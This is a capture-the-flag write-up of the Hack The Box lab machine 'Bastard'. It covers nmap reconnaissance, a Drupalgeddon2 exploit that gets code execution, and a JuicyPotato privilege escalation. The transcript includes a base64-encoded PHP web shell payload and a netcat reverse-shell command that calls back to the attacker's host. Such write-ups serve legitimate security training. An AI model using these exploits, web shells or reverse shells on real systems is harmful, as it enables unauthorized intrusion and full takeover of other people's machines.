Hack The Box : Bastard
3 August, 2021
Beginning with an nmap scan
# nmap 10.10.10.9
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-03 10:16 EDT
Nmap scan report for 10.10.10.9
Host is up (0.22s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
49154/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 19.41 seconds
# nmap -A -p 80,135,49154 10.10.10.9
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-03 10:30 EDT
Nmap scan report for 10.10.10.9
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 301.70 ms 10.10.16.1
2 453.44 ms 10.10.10.9
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.15 seconds
Looking at Drupal in the output, I immediately checked if the famous Drupalgeddon exploit would work.
User
The Drupalgedon exploit worked and I was able to get the user flag.
$ ./drupalgeddon2.rb 10.10.10.9
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
--------------------------------------------------------------------------------
[+] Found : http://10.10.10.9/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo HOZCGODV
[+] Result : HOZCGODV
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://10.10.10.9/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file (http://10.10.10.9/sites/default/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (sites/default/)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file (http://10.10.10.9/sites/default/files/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (sites/default/files/)
[*] Moving : ./sites/default/files/.htaccess
[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> whoami
nt authority\iusr
drupalgeddon2>> dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\inetpub\drupal-7.54
19/03/2017 09:04 �� <DIR> .
19/03/2017 09:04 �� <DIR> ..
19/03/2017 01:42 �� 317 .editorconfig
19/03/2017 01:42 �� 174 .gitignore
19/03/2017 01:42 �� 5.969 .htaccess
19/03/2017 01:42 �� 6.604 authorize.php
19/03/2017 01:42 �� 110.781 CHANGELOG.txt
19/03/2017 01:42 �� 1.481 COPYRIGHT.txt
19/03/2017 01:42 �� 720 cron.php
19/03/2017 01:43 �� <DIR> includes
19/03/2017 01:42 �� 529 index.php
19/03/2017 01:42 �� 1.717 INSTALL.mysql.txt
19/03/2017 01:42 �� 1.874 INSTALL.pgsql.txt
19/03/2017 01:42 �� 703 install.php
19/03/2017 01:42 �� 1.298 INSTALL.sqlite.txt
19/03/2017 01:42 �� 17.995 INSTALL.txt
19/03/2017 01:42 �� 18.092 LICENSE.txt
19/03/2017 01:42 �� 8.710 MAINTAINERS.txt
19/03/2017 01:43 �� <DIR> misc
19/03/2017 01:43 �� <DIR> modules
19/03/2017 01:43 �� <DIR> profiles
19/03/2017 01:42 �� 5.382 README.txt
19/03/2017 01:42 �� 2.189 robots.txt
19/03/2017 01:43 �� <DIR> scripts
19/03/2017 01:43 �� <DIR> sites
19/03/2017 01:43 �� <DIR> themes
19/03/2017 01:42 �� 19.986 update.php
19/03/2017 01:42 �� 10.123 UPGRADE.txt
19/03/2017 01:42 �� 2.200 web.config
19/03/2017 01:42 �� 417 xmlrpc.php
21 File(s) 217.261 bytes
9 Dir(s) 30.817.415.168 bytes free
drupalgeddon2>> dir C:\Users\
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users
19/03/2017 08:35 �� <DIR> .
19/03/2017 08:35 �� <DIR> ..
19/03/2017 02:20 �� <DIR> Administrator
19/03/2017 02:54 �� <DIR> Classic .NET AppPool
19/03/2017 08:35 �� <DIR> dimitris
14/07/2009 07:57 �� <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 30.817.411.072 bytes free
drupalgeddon2>> dir C:\Users\dimitris\Desktop
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users\dimitris\Desktop
19/03/2017 09:04 �� <DIR> .
19/03/2017 09:04 �� <DIR> ..
19/03/2017 09:06 �� 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 30.817.411.072 bytes free
drupalgeddon2>> type C:\Users\dimitris\Desktop\user.txt
<flag>
Root
I ran systeminfo and saw the box was running on Windows Server 2008. Along with this whoami /priv showed that the SeImpersonatePrivilege was enabled as well
drupalgeddon2>> systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 3/8/2021, 5:15:26 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.579 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.606 MB
Virtual Memory: In Use: 489 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
drupalgeddon2>> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
Given this information, I had two exploits in mind
The first one didn't work. But the second one did and I caught a reverse shell as the root user
drupalgeddon2>> JuicyPotato.exe -l 4243 -p C:\Windows\System32\cmd.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} -a "/c C:\inetpub\drupal-7.54\nc.exe -e cmd.exe <ip> 4243"
$ nc -lvnp 4243
listening on [any] 4243 ...
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>dir C:\Users\Administrator\Desktop
dir C:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users\Administrator\Desktop
19/03/2017 08:33 �� <DIR> .
19/03/2017 08:33 �� <DIR> ..
19/03/2017 08:34 �� 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 30.816.968.704 bytes free
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt.txt
type C:\Users\Administrator\Desktop\root.txt.txt
<flag>